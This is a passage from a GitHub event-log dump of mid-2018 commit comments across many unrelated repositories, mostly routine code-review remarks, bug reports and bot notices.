[dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T14:18:22Z"}
{"id":"7950399040","type":"CommitCommentEvent","actor":{"login":"BjoernLudwigPTB"},"repo":{"name":"Met4FoF/Code"},"payload":{"comment":{"id":29671877,"position":12,"line":29,"path":"README.md","commit_id":"4d2d73ae260533a5cb3bb7a2786751047ae02efd","created_at":"2018-07-11T14:18:24Z","updated_at":"2018-07-11T14:18:24Z","author_association":"CONTRIBUTOR","body":"Here the zenodo community is introduced. Please check if you like the wording."}},"created_at":"2018-07-11T14:18:24Z"}
{"id":"7950404940","type":"CommitCommentEvent","actor":{"login":"BeatrizSSA"},"repo":{"name":"brunaneves7/Heads-Up-Se-Liga-"},"payload":{"comment":{"id":29671887,"position":null,"line":null,"path":null,"commit_id":"cdeb0b3884d7f3f7a602e278291f140fcaf96e2b","created_at":"2018-07-11T14:19:15Z","updated_at":"2018-07-11T14:19:15Z","author_association":"COLLABORATOR","body":"Comitei com usuário errado"}},"created_at":"2018-07-11T14:19:15Z"}
{"id":"7950405247","type":"CommitCommentEvent","actor":{"login":"ihulsbus"},"repo":{"name":"afklm/crowd"},"payload":{"comment":{"id":29671891,"position":null,"line":null,"path":null,"commit_id":"33a0fd7838a17f59e36697713cfcd44d1fd369d8","created_at":"2018-07-11T14:19:17Z","updated_at":"2018-07-11T14:19:17Z","author_association":"MEMBER","body":"@katbyte You also requested to adopt the JIRA cookbook. Is this still something you want? \r\nWill you manage the cookbooks privately or from your organisation? "}},"created_at":"2018-07-11T14:19:17Z"}
{"id":"7950408310","type":"CommitCommentEvent","actor":{"login":"elimisteve"},"repo":{"name":"PursuanceProject/pursuance"},"payload":{"comment":{"id":29671896,"position":39,"line":39,"path":"src/components/Content/Invite/Invite.js","commit_id":"8626eb958adf6f7b74f86855e6a167ecfa42a042","created_at":"2018-07-11T14:19:44Z","updated_at":"2018-07-11T14:19:44Z","author_association":"MEMBER","body":"@4xdk @colinfruit Add CSS class(es) around here so that each invite has its own row"}},"created_at":"2018-07-11T14:19:44Z"}
{"id":"7950409264","type":"CommitCommentEvent","actor":{"login":"amitness"},"repo":{"name":"amitness/dotfiles"},"payload":{"comment":{"id":29671899,"position":null,"line":null,"path":null,"commit_id":"88b1991394829e2062ed76ef2270b6000a62fd60","created_at":"2018-07-11T14:19:53Z","updated_at":"2018-07-11T14:19:53Z","author_association":"OWNER","body":"@sarojkh No problem."}},"created_at":"2018-07-11T14:19:53Z"}
{"id":"7950414616","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"sematext/docs"},"payload":{"comment":{"id":29671906,"position":null,"line":null,"path":null,"commit_id":"64a22a2a8e9b3b2ea08c6a8462c1afcaf9bc473d","created_at":"2018-07-11T14:20:39Z","updated_at":"2018-07-11T14:20:39Z","author_association":"MEMBER","body":"I don't think this page is exposed anywhere @goranbajic so maybe it needs to be removed.  Product Updates is coming."}},"created_at":"2018-07-11T14:20:39Z"}
{"id":"7950419473","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29671913,"position":67,"line":4952,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"609271bc684c6529ca1c063378dca5aeb6a081b9","created_at":"2018-07-11T14:21:24Z","updated_at":"2018-07-11T14:21:24Z","author_association":"COLLABORATOR","body":"probably `<adv><itg>`"}},"created_at":"2018-07-11T14:21:24Z"}
{"id":"7950422997","type":"CommitCommentEvent","actor":{"login":"RSpliet"},"repo":{"name":"CMU-SAFARI/ramulator"},"payload":{"comment":{"id":29671917,"position":70,"line":88,"path":"src/DDR4.cpp","commit_id":"cd96ed6a842d8c5bfb6153eb8698e41f48f53da0","created_at":"2018-07-11T14:21:55Z","updated_at":"2018-07-11T14:21:55Z","author_association":"NONE","body":"Should be \r\n`{216, 252, 288, 324, 432},`"}},"created_at":"2018-07-11T14:21:55Z"}
{"id":"7950425318","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/google-auth-oauthlib-feedstock"},"payload":{"comment":{"id":29671919,"position":null,"line":null,"path":null,"commit_id":"b10658ab563e218ab0dd95a6560751994114cee9","created_at":"2018-07-11T14:22:16Z","updated_at":"2018-07-11T14:22:16Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @jonparrott were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @jonparrott were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-11T14:22:16Z"}
{"id":"7950426882","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29671927,"position":null,"line":null,"path":null,"commit_id":"d2accc1aaacd06bbf755aef493737629d562ae87","created_at":"2018-07-11T14:22:28Z","updated_at":"2018-07-11T14:22:28Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-277](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-277).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-277-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-11T14:22:28Z"}
{"id":"7950430405","type":"CommitCommentEvent","actor":{"login":"ThisMushroom"},"repo":{"name":"MUnique/OpenMU"},"payload":{"comment":{"id":29671934,"position":null,"line":null,"path":null,"commit_id":"d6c33640b02d32b4f2f441475f947c19808ea2d5","created_at":"2018-07-11T14:22:59Z","updated_at":"2018-07-11T14:22:59Z","author_association":"NONE","body":"Maybe it would be more convenient to remain numeric (ahh with one string) style of CreateSkill() method?\r\nYup, with current variation it is more readable and self-explanatory, but there are already params that are numeric and far not  self-explanatory.\r\n\r\nLike:\r\n```\r\nthis.CreateSkill(9, \"Evil Spirit\", 50, 45, 90, 0, 6, 100, 0, -1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 4);\r\n\r\nprivate void CreateSkill( ... int skillType = 0)\r\n{\r\n...\r\nskill.SkillType = (SkillType)skillType;\r\n...\r\n}\r\n```\r\n\r\nJust a slice of personal philosophy "}},"created_at":"2018-07-11T14:22:59Z"}
{"id":"7950436433","type":"CommitCommentEvent","actor":{"login":"jckautzmann"},"repo":{"name":"Adobe-Marketing-Cloud/aem-core-wcm-components"},"payload":{"comment":{"id":29671956,"position":null,"line":null,"path":null,"commit_id":"2da19664f6f7286bcfb1bf5d723d1e8142c16036","created_at":"2018-07-11T14:23:52Z","updated_at":"2018-07-11T14:23:52Z","author_association":"CONTRIBUTOR","body":"This is an interesting approach based on consuming json on the client-side to render the widget. Another approach would consist in having a HTL template (server-side)."}},"created_at":"2018-07-11T14:23:52Z"}
{"id":"7950437603","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":29671957,"position":null,"line":null,"path":null,"commit_id":"1e77a72ed6ed6dc88cb7a8443899e3fa11fd0c78","created_at":"2018-07-11T14:24:03Z","updated_at":"2018-07-11T14:24:03Z","author_association":"COLLABORATOR","body":"Also see [Issue 683](https://github.com/weidai11/cryptopp/issues/683)."}},"created_at":"2018-07-11T14:24:03Z"}
{"id":"7950437770","type":"CommitCommentEvent","actor":{"login":"isaachier"},"repo":{"name":"sustrik/libmill"},"payload":{"comment":{"id":29671958,"position":null,"line":null,"path":null,"commit_id":"61322eaf794db1941b4ee1bc64836e3378ca06f0","created_at":"2018-07-11T14:24:04Z","updated_at":"2018-07-11T14:24:04Z","author_association":"CONTRIBUTOR","body":"OK but what benefit is there to making it non-relocatable?"}},"created_at":"2018-07-11T14:24:04Z"}
{"id":"7950441348","type":"CommitCommentEvent","actor":{"login":"fieldOfView"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29671965,"position":null,"line":null,"path":null,"commit_id":"abf1610923d991c0b7f2c3adf41c26bd61d14406","created_at":"2018-07-11T14:24:36Z","updated_at":"2018-07-11T14:24:36Z","author_association":"CONTRIBUTOR","body":"One could argue that FFF is superfluous, given that the Peopoly Moai is also using Cura. \"Custom 3D Printer\"?\r\n\r\nAlso, fdm is still used a lot in filenames and ids. Is that going to have to change too?"}},"created_at":"2018-07-11T14:24:36Z"}
{"id":"7950442287","type":"CommitCommentEvent","actor":{"login":"michaelrsweet"},"repo":{"name":"istopwg/ippsample"},"payload":{"comment":{"id":29671966,"position":null,"line":null,"path":null,"commit_id":"6d2df36ba8676e19d9e0bbe9aca9925c6d66fcf0","created_at":"2018-07-11T14:24:44Z","updated_at":"2018-07-11T14:24:44Z","author_association":"CONTRIBUTOR","body":"Hmm, I'll look into that - wasn't obvious from the Travis documentation that this was possible... :/\r\n"}},"created_at":"2018-07-11T14:24:44Z"}
{"id":"7950442564","type":"CommitCommentEvent","actor":{"login":"pdurbin"},"repo":{"name":"IQSS/dataverse"},"payload":{"comment":{"id":29671967,"position":null,"line":null,"path":null,"commit_id":"ef7b2e08c184b542d1f50663cd0e13e201ffcdcd","created_at":"2018-07-11T14:24:47Z","updated_at":"2018-07-11T14:24:47Z","author_association":"MEMBER","body":"@thaorell wait, what problem are you solving here? I thought I fixed up the jhove stuff in b9c534f."}},"created_at":"2018-07-11T14:24:47Z"}
{"id":"7950442844","type":"CommitCommentEvent","actor":{"login":"fulanito90"},"repo":{"name":"PluginsOCSInventory-NG/officepack"},"payload":{"comment":{"id":29671969,"position":null,"line":null,"path":null,"commit_id":"2625cf4e7e4f337c5ea3ff63e0d83c23d5236d76","created_at":"2018-07-11T14:24:49Z","updated_at":"2018-07-11T14:24:49Z","author_association":"NONE","body":"there is a problem, if you have office 365 license, the script is shown 2 times indicating that you have office 2010 with the office 365 license and then the script with the office 365 message and your license appears again in the ocs inventory \"software\" shows you as if it were an office 2010 license."}},"created_at":"2018-07-11T14:24:49Z"}
{"id":"7950444166","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29671973,"position":null,"line":null,"path":null,"commit_id":"3e63f50c61ca9c9631e39325d6c000de537e7b34","created_at":"2018-07-11T14:25:01Z","updated_at":"2018-07-11T14:25:01Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [018 - Buscas auxiliares para Implementar Classe Create Cep](https://trello.com/c/JFKSJ8gb/24-018-buscas-auxiliares-para-implementar-classe-create-cep)"}},"created_at":"2018-07-11T14:25:01Z"}
{"id":"7950448957","type":"CommitCommentEvent","actor":{"login":"alekseisasin"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":29671985,"position":null,"line":null,"path":null,"commit_id":"596a7b7169b9c7e41cd4751f99eea656f67ed2b7","created_at":"2018-07-11T14:25:44Z","updated_at":"2018-07-11T14:25:44Z","author_association":"CONTRIBUTOR","body":"The \"exit\" is a method. How can I catch when it is triggered? "}},"created_at":"2018-07-11T14:25:44Z"}
{"id":"7950468966","type":"CommitCommentEvent","actor":{"login":"richardhand"},"repo":{"name":"Adobe-Marketing-Cloud/aem-core-wcm-components"},"payload":{"comment":{"id":29672040,"position":29,"line":29,"path":"content/src/content/jcr_root/apps/core/wcm/sandbox/commons/ui/clientlibs/js/model/PanelContainer.js","commit_id":"2da19664f6f7286bcfb1bf5d723d1e8142c16036","created_at":"2018-07-11T14:28:37Z","updated_at":"2018-07-11T14:28:37Z","author_association":"CONTRIBUTOR","body":"@jckautzmann - this is more about the editor context, where we need to keep a track of which item is currently active for setting the active item in the popover, for example.\r\n\r\nWhat do you mean by (present form)? I wouldn't expect this class to have knowledge of the dialog form context. Rather in the dialog I would initialise this from the form ID or lookup the Panel Container from a store."}},"created_at":"2018-07-11T14:28:37Z"}
{"id":"7950475385","type":"CommitCommentEvent","actor":{"login":"kargakis"},"repo":{"name":"openshift/service-catalog"},"payload":{"comment":{"id":29672050,"position":5,"line":15,"path":"tools/changelog/changelog.go","commit_id":"ccd7b8a201cac4f715be1d2f7a92f409ad6d8607","created_at":"2018-07-11T14:29:29Z","updated_at":"2018-07-11T14:29:29Z","author_association":"MEMBER","body":"bad replace?"}},"created_at":"2018-07-11T14:29:29Z"}
{"id":"7950476343","type":"CommitCommentEvent","actor":{"login":"thaorell"},"repo":{"name":"IQSS/dataverse"},"payload":{"comment":{"id":29672053,"position":null,"line":null,"path":null,"commit_id":"ef7b2e08c184b542d1f50663cd0e13e201ffcdcd","created_at":"2018-07-11T14:29:38Z","updated_at":"2018-07-11T14:29:38Z","author_association":"NONE","body":"Sorry I thought you missed the jhove directory in build.sh, and I just saw that in Dockerfile. Will delete this now"}},"created_at":"2018-07-11T14:29:38Z"}
{"id":"7950477846","type":"CommitCommentEvent","actor":{"login":"deepakkapse"},"repo":{"name":"deepakkapse/hello_world"},"payload":{"comment":{"id":29672056,"position":null,"line":null,"path":null,"commit_id":"6828152bced49421db7732f4a60229e0120463db","created_at":"2018-07-11T14:29:51Z","updated_at":"2018-07-11T14:29:51Z","author_association":"OWNER","body":"pulling request"}},"created_at":"2018-07-11T14:29:51Z"}
{"id":"7950479457","type":"CommitCommentEvent","actor":{"login":"EliSnow"},"repo":{"name":"EliSnow/hyper"},"payload":{"comment":{"id":29672060,"position":45,"line":555,"path":"src/client/connect.rs","commit_id":"212f83c89f46d372b95f26313a48e13478014825","created_at":"2018-07-11T14:30:05Z","updated_at":"2018-07-11T14:30:05Z","author_association":"OWNER","body":"I just realized that I'm returning `self` here which doesn't follow the convention of the other `set[...]` methods for `HttpConnector`."}},"created_at":"2018-07-11T14:30:05Z"}
{"id":"7950481696","type":"CommitCommentEvent","actor":{"login":"kargakis"},"repo":{"name":"openshift/service-catalog"},"payload":{"comment":{"id":29672064,"position":5,"line":10,"path":"tools/junitreport/junitreport.go","commit_id":"ccd7b8a201cac4f715be1d2f7a92f409ad6d8607","created_at":"2018-07-11T14:30:24Z","updated_at":"2018-07-11T14:30:24Z","author_association":"MEMBER","body":"Shouldn't we use openshift/service-catalog vs incubator?"}},"created_at":"2018-07-11T14:30:24Z"}
{"id":"7950482616","type":"CommitCommentEvent","actor":{"login":"mattgodbolt"},"repo":{"name":"ubsan/compiler-explorer"},"payload":{"comment":{"id":29672066,"position":7,"line":89,"path":"lib/base-compiler.js","commit_id":"314a205d6f16cfddf3e04304e66f9e4416572138","created_at":"2018-07-11T14:30:32Z","updated_at":"2018-07-11T14:30:32Z","author_association":"NONE","body":"This is very MS specific: I think it'd be better to be in the CL.js implementation. I realise the `includePath` in compiler-finder.js is common, and I'm not sure how to deal with that...but this seems very MS specific here."}},"created_at":"2018-07-11T14:30:32Z"}
{"id":"7950486820","type":"CommitCommentEvent","actor":{"login":"maxkfranz"},"repo":{"name":"cytoscape/cytoscape.js"},"payload":{"comment":{"id":29672074,"position":null,"line":null,"path":null,"commit_id":"eebe6a8d192296f18884f3ae192e198dfc1d270e","created_at":"2018-07-11T14:31:09Z","updated_at":"2018-07-11T14:31:09Z","author_association":"MEMBER","body":"Ref #2153"}},"created_at":"2018-07-11T14:31:09Z"}
{"id":"7950491159","type":"CommitCommentEvent","actor":{"login":"sxxgrc"},"repo":{"name":"theaidenlab/Juicebox"},"payload":{"comment":{"id":29672088,"position":null,"line":null,"path":null,"commit_id":"87688617dc706f943f2a1eab12660edf9f341613","created_at":"2018-07-11T14:31:47Z","updated_at":"2018-07-11T14:31:47Z","author_association":"COLLABORATOR","body":"Does getting features from just gstart and gend work for the .bed files? I thought we decided to use the entire chromosome for them due to the issues with zooming. If it works though I'm all the happier."}},"created_at":"2018-07-11T14:31:47Z"}
{"id":"7950497331","type":"CommitCommentEvent","actor":{"login":"smutek"},"repo":{"name":"smutek/DegreeSorter"},"payload":{"comment":{"id":29672104,"position":null,"line":null,"path":null,"commit_id":"713b49ef63bd58e473fd27bd5f25cb4e44302425","created_at":"2018-07-11T14:32:42Z","updated_at":"2018-07-11T14:32:42Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Foo](https://trello.com/c/7HJGkBN4/23-foo)"}},"created_at":"2018-07-11T14:32:42Z"}
{"id":"7950498073","type":"CommitCommentEvent","actor":{"login":"jckautzmann"},"repo":{"name":"Adobe-Marketing-Cloud/aem-core-wcm-components"},"payload":{"comment":{"id":29672105,"position":29,"line":29,"path":"content/src/content/jcr_root/apps/core/wcm/sandbox/commons/ui/clientlibs/js/model/PanelContainer.js","commit_id":"2da19664f6f7286bcfb1bf5d723d1e8142c16036","created_at":"2018-07-11T14:32:48Z","updated_at":"2018-07-11T14:32:48Z","author_association":"CONTRIBUTOR","body":"I mean that the verb should be in present form: gets instead of get\r\n`Gets the index of the currently active panel`"}},"created_at":"2018-07-11T14:32:48Z"}
{"id":"7950503617","type":"CommitCommentEvent","actor":{"login":"PROBLEMS67"},"repo":{"name":"CyberBiology/Genesis"},"payload":{"comment":{"id":29672115,"position":null,"line":null,"path":null,"commit_id":"3c744fbfb67b4dc324f6cfe00dbec2753ca6b2bb","created_at":"2018-07-11T14:33:38Z","updated_at":"2018-07-11T14:33:38Z","author_association":"NONE","body":"Сделайте сохранения. И редактор карт. Просмотр и изменения в коде робота ОК?\r\n"}},"created_at":"2018-07-11T14:33:38Z"}
{"id":"7950506798","type":"CommitCommentEvent","actor":{"login":"Sim2164"},"repo":{"name":"aseylys/KStock"},"payload":{"comment":{"id":29672123,"position":null,"line":null,"path":null,"commit_id":"e60de98dba17a127e1b6919294b8f7ac09268b31","created_at":"2018-07-11T14:34:07Z","updated_at":"2018-07-11T14:34:07Z","author_association":"NONE","body":"Hello, I have only been able to run it one time successfully during market close hours using public wifi. (A bit laggy, any way for me to improve the speed? Is it my computer maybe?) At home, it does not work for me. I these errors... attached are the pictures. \r\n\r\n2. How do I input the QTY amount I want to buy after I add Ticker? \r\n\r\n3. How does the program select stocks, if I do not use the add Ticker function mannually? \r\n\r\n4. How do I see the potential profit I could have made in TESTING mode?\r\n\r\nThank you for answering these questions and helping me.\r\n\r\n![error_1](https://user-images.githubusercontent.com/41095778/42579250-e1b97a1c-84f5-11e8-83ee-f702270bd768.png)\r\n![error_2](https://user-images.githubusercontent.com/41095778/42579252-e1f9bc62-84f5-11e8-88da-b07fd90a9e9e.png)\r\n\r\n\r\n"}},"created_at":"2018-07-11T14:34:07Z"}
{"id":"7950507205","type":"CommitCommentEvent","actor":{"login":"drchristhorpe"},"repo":{"name":"openactive/open-booking-api"},"payload":{"comment":{"id":29672125,"position":null,"line":null,"path":null,"commit_id":"5ea709f197615711c6c1396a2e97af369df7ae34","created_at":"2018-07-11T14:34:10Z","updated_at":"2018-07-11T14:34:10Z","author_association":"CONTRIBUTOR","body":"Clarification relating to Issue #21 "}},"created_at":"2018-07-11T14:34:10Z"}
{"id":"7950510567","type":"CommitCommentEvent","actor":{"login":"ThePiGuy0"},"repo":{"name":"LineageOS/android_device_lge_g2-common"},"payload":{"comment":{"id":29672136,"position":null,"line":null,"path":null,"commit_id":"54e993ca6a54dd8d9c1f487b3b35383b5b2b780b","created_at":"2018-07-11T14:34:40Z","updated_at":"2018-07-11T14:34:40Z","author_association":"NONE","body":"Did you have any issues with charging animations appearing? On the LG G4 we just get a blank screen"}},"created_at":"2018-07-11T14:34:40Z"}
{"id":"7950512265","type":"CommitCommentEvent","actor":{"login":"yairchu"},"repo":{"name":"da-x/git-search-replace"},"payload":{"comment":{"id":29672138,"position":66,"line":91,"path":"gitsearchreplace/__init__.py","commit_id":"312c2a27ece108b8d0a2d200a9cd7e416a4ad3ac","created_at":"2018-07-11T14:34:55Z","updated_at":"2018-07-11T14:34:55Z","author_association":"CONTRIBUTOR","body":"This line looks weird? But with Python I never know.."}},"created_at":"2018-07-11T14:34:55Z"}
{"id":"7950514490","type":"CommitCommentEvent","actor":{"login":"davecramer"},"repo":{"name":"pgjdbc/pgjdbc"},"payload":{"comment":{"id":29672148,"position":null,"line":null,"path":null,"commit_id":"671913b1b2e68668c11b8b4fd9a0aa9395dab5e6","created_at":"2018-07-11T14:35:15Z","updated_at":"2018-07-11T14:35:15Z","author_association":"MEMBER","body":"shouldn't the comment be 42.2.3 ?"}},"created_at":"2018-07-11T14:35:15Z"}
{"id":"7950515353","type":"CommitCommentEvent","actor":{"login":"bryanSadler"},"repo":{"name":"nodeca/mincer"},"payload":{"comment":{"id":29672151,"position":null,"line":null,"path":null,"commit_id":"7ae75d049d9b99b24465fddd5cc972491c7b5a04","created_at":"2018-07-11T14:35:23Z","updated_at":"2018-07-11T14:35:23Z","author_association":"NONE","body":"This breaks when you try and instantiate a mincer environment. You'll need to change your implementation of lodash's forEach method for your test to pass.\r\n`TypeError: Cannot read property 'addEngineToTrail' of undefined\r\n      at /Users/bvs002/Sites/nuvo-dashing-js(Git)/node_modules/mincer/lib/mincer/environment.js:83:10\r\n      at /Users/bvs002/Sites/nuvo-dashing-js(Git)/node_modules/lodash/lodash.js:4917:15\r\n      at baseForOwn (node_modules/lodash/lodash.js:3002:24)\r\n      at /Users/bvs002/Sites/nuvo-dashing-js(Git)/node_modules/lodash/lodash.js:4886:18\r\n      at Function.forEach (node_modules/lodash/lodash.js:9334:14)\r\n      at new Environment (node_modules/mincer/lib/mincer/environment.js:82:5)\r\n      at Context.<anonymous> (test/mincer_test.js:11:19)`"}},"created_at":"2018-07-11T14:35:23Z"}
{"id":"7950516756","type":"CommitCommentEvent","actor":{"login":"dluksza"},"repo":{"name":"invertase/react-native-firebase"},"payload":{"comment":{"id":29672153,"position":19,"line":368,"path":"android/src/main/java/io/invertase/firebase/notifications/RNFirebaseNotificationManager.java","commit_id":"886efcaa624aafd48a8ec56e219d0e4190e56942","created_at":"2018-07-11T14:35:35Z","updated_at":"2018-07-11T14:35:35Z","author_association":"CONTRIBUTOR","body":"This will only work *as expected* when `repeatInterval` is set to `day`. In case of `minute`, `hour` and `week` it could produce unexpected behaviour."}},"created_at":"2018-07-11T14:35:35Z"}
{"id":"7950529871","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"element2562/TV-shows"},"payload":{"comment":{"id":29672179,"position":null,"line":null,"path":null,"commit_id":"9a2767a757759b22ea17f92bee682a4e267c9780","created_at":"2018-07-11T14:37:30Z","updated_at":"2018-07-11T14:37:30Z","author_association":"NONE","body":"This is great work, Jacob! Just to be nitpicky, go back and double check the requirements; there are a few places where you're not quite following them. \r\nFor your checkbox DB function, check out a method called `PATCH` instead of `PUT`.  It'll do the thing you are trying to make it do."}},"created_at":"2018-07-11T14:37:30Z"}
{"id":"7950531969","type":"CommitCommentEvent","actor":{"login":"ChipTechno"},"repo":{"name":"ChipTechno/WiFiMan"},"payload":{"comment":{"id":29672186,"position":null,"line":null,"path":null,"commit_id":"9b981ad7281fa7001a2ef06af88e236b0e7c6110","created_at":"2018-07-11T14:37:49Z","updated_at":"2018-07-11T14:37:49Z","author_association":"OWNER","body":"Thank you!"}},"created_at":"2018-07-11T14:37:49Z"}
{"id":"7950532616","type":"CommitCommentEvent","actor":{"login":"jinjiren"},"repo":{"name":"jinjiren/awesome-chainer"},"payload":{"comment":{"id":29672190,"position":null,"line":null,"path":null,"commit_id":"027e8061bd7cf8c7551f01218fe27891e81eda84","created_at":"2018-07-11T14:37:54Z","updated_at":"2018-07-11T14:37:54Z","author_association":"OWNER","body":"I forgot to add the commit message. This commit aims to use the correct URL for Chainer official guides."}},"created_at":"2018-07-11T14:37:54Z"}
{"id":"7950533203","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/bankline_csv_import_file"},"payload":{"comment":{"id":29672192,"position":5,"line":5,"path":"lib/bankline_csv_import_file/record.rb","commit_id":"d6a293b530f2354ff31a2b1c21bb0230ebcd6775","created_at":"2018-07-11T14:37:59Z","updated_at":"2018-07-11T14:37:59Z","author_association":"MEMBER","body":"Done: https://github.com/barsoom/bankline_csv_import_file/commit/3305d6310caca06a16cf6127a817d7bc89070c83"}},"created_at":"2018-07-11T14:37:59Z"}
{"id":"7950534609","type":"CommitCommentEvent","actor":{"login":"Rian501"},"repo":{"name":"element2562/TV-shows"},"payload":{"comment":{"id":29672193,"position":null,"line":null,"path":null,"commit_id":"9a2767a757759b22ea17f92bee682a4e267c9780","created_at":"2018-07-11T14:38:12Z","updated_at":"2018-07-11T14:38:12Z","author_association":"NONE","body":"Also, in future, try to do more than one commit for an entire day's work! 😉 "}},"created_at":"2018-07-11T14:38:12Z"}
{"id":"7950538348","type":"CommitCommentEvent","actor":{"login":"michaelrsweet"},"repo":{"name":"istopwg/ippsample"},"payload":{"comment":{"id":29672196,"position":null,"line":null,"path":null,"commit_id":"6d2df36ba8676e19d9e0bbe9aca9925c6d66fcf0","created_at":"2018-07-11T14:38:45Z","updated_at":"2018-07-11T14:38:45Z","author_association":"CONTRIBUTOR","body":"@StefanScherer Not sure how to integrate all of this; for now I'll leave this as-is, but if you are so inclined I'll be happy to take a pull request... :)  In the meantime we still have the snap getting built with everything enabled so that at least regularly tests the Linux side of things..."}},"created_at":"2018-07-11T14:38:45Z"}
{"id":"7950539340","type":"CommitCommentEvent","actor":{"login":"bpasero"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":29672198,"position":9,"line":18,"path":"src/vs/workbench/electron-browser/media/shell.css","commit_id":"0bef29d2eadd04b48d9518b5a96259ec54b64434","created_at":"2018-07-11T14:38:54Z","updated_at":"2018-07-11T14:38:54Z","author_association":"MEMBER","body":"😱 "}},"created_at":"2018-07-11T14:38:54Z"}
{"id":"7950540933","type":"CommitCommentEvent","actor":{"login":"richardhand"},"repo":{"name":"Adobe-Marketing-Cloud/aem-core-wcm-components"},"payload":{"comment":{"id":29672200,"position":67,"line":67,"path":"content/src/content/jcr_root/apps/core/wcm/sandbox/commons/ui/clientlibs/js/model/PanelContainer.js","commit_id":"2da19664f6f7286bcfb1bf5d723d1e8142c16036","created_at":"2018-07-11T14:39:10Z","updated_at":"2018-07-11T14:39:10Z","author_association":"CONTRIBUTOR","body":"yes, we should probably break it down. We're kind of recreating what already exists in `Granite.author.persistence` but that deals with editables and probably isn't suitable from the dialog."}},"created_at":"2018-07-11T14:39:10Z"}
{"id":"7950542663","type":"CommitCommentEvent","actor":{"login":"linuxzhongguo1"},"repo":{"name":"eostea/eos-wallet"},"payload":{"comment":{"id":29672204,"position":2,"line":2,"path":".babelrc","commit_id":"31711f090623dda542680717d176384e7e087643","created_at":"2018-07-11T14:39:25Z","updated_at":"2018-07-11T14:39:25Z","author_association":"NONE","body":"qian"}},"created_at":"2018-07-11T14:39:25Z"}
{"id":"7950548135","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29672225,"position":null,"line":null,"path":null,"commit_id":"362698ca713e59a56a131404efde254a41e744ad","created_at":"2018-07-11T14:40:16Z","updated_at":"2018-07-11T14:40:16Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-334](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-334).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-334-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-11T14:40:16Z"}
{"id":"7950551372","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672239,"position":66,"line":358,"path":"ArgusWebServices/src/main/java/com/salesforce/dva/argus/ws/resources/UserResources.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T14:40:43Z","updated_at":"2018-07-11T14:40:43Z","author_association":"NONE","body":"Add space before and after ="}},"created_at":"2018-07-11T14:40:43Z"}
{"id":"7950553584","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29672244,"position":null,"line":null,"path":null,"commit_id":"8c9f491454578136191edf4bbf33aff8cc369ce6","created_at":"2018-07-11T14:41:02Z","updated_at":"2018-07-11T14:41:02Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-335](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-335).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-335-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-11T14:41:02Z"}
{"id":"7950556021","type":"CommitCommentEvent","actor":{"login":"gauravk48"},"repo":{"name":"cannakula-sfdc/Argus"},"payload":{"comment":{"id":29672249,"position":67,"line":359,"path":"ArgusWebServices/src/main/java/com/salesforce/dva/argus/ws/resources/UserResources.java","commit_id":"657624f60d2bb7838bf7261f21f0e9b8b386c366","created_at":"2018-07-11T14:41:24Z","updated_at":"2018-07-11T14:41:24Z","author_association":"NONE","body":"Do null check"}},"created_at":"2018-07-11T14:41:24Z"}
